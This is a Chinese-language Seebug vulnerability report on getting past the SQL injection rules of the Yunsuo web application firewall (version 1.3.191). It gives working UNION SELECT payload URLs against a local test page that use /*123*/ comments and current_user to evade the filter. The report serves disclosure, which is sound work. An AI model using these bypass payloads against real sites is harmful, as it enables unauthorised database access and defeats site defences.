云锁最新版1.3.191防护规则绕过

2015-03-22T00:00:00
ID SSV:95520
Type seebug
Reporter Root
Modified 2015-03-22T00:00:00

Description

简要描述:

绕了几周终于绕过去了,真的不容易,求首页 执着是一种态度~

详细说明:

测试的是windows下的win_1.3.191最新版 存在两个问题: 1.默认配置对POST和cookie没防护,有防护的功能默认勾上呗

<img src="https://images.seebug.org/upload/201503/221526272b1c2aece20b6b431de64be51d694796.jpg" alt="y.jpg" width="600" onerror="javascript:errimg(this);">

2.防护规则可被/123/这种形式绕过

漏洞证明:

还是配置一个注入环境: 1.先试下/**/发现被云锁拦截了:

http://localhost/74/wap/wap-company-show.php?id=8E0union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#

<img src="https://images.seebug.org/upload/201503/22152947bc23b6813011590dbe5a7ff5b01497b0.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">

2.使用/**/成功得到很多字段:

http://localhost/74/wap/wap-company-show.php?id=8E0union/*123*/select/*123*/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#

<img src="https://images.seebug.org/upload/201503/221528336bd498d8ce296273e5ea6deeba52d3e5.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">

3.问题又来了,发现云锁对数据库查询防护很严格

http://localhost/74/wap/wap-company-show.php?id=8E0union/*123*/select/*123*/1,2,3,user%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#

<img src="https://images.seebug.org/upload/201503/221531374299d7a0bfbd3d57da283edd8ba82eee.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">

4.经过几周的学习,发现current_user这个方式又可以绕过了!

http://localhost/74/wap/wap-company-show.php?id=8E0union/*123*/select/*123*/1,2,3,current_user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#

<img src="https://images.seebug.org/upload/201503/2215330881a0dae42e1d7c601c74e058d483e8b2.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">

执着是一种态度~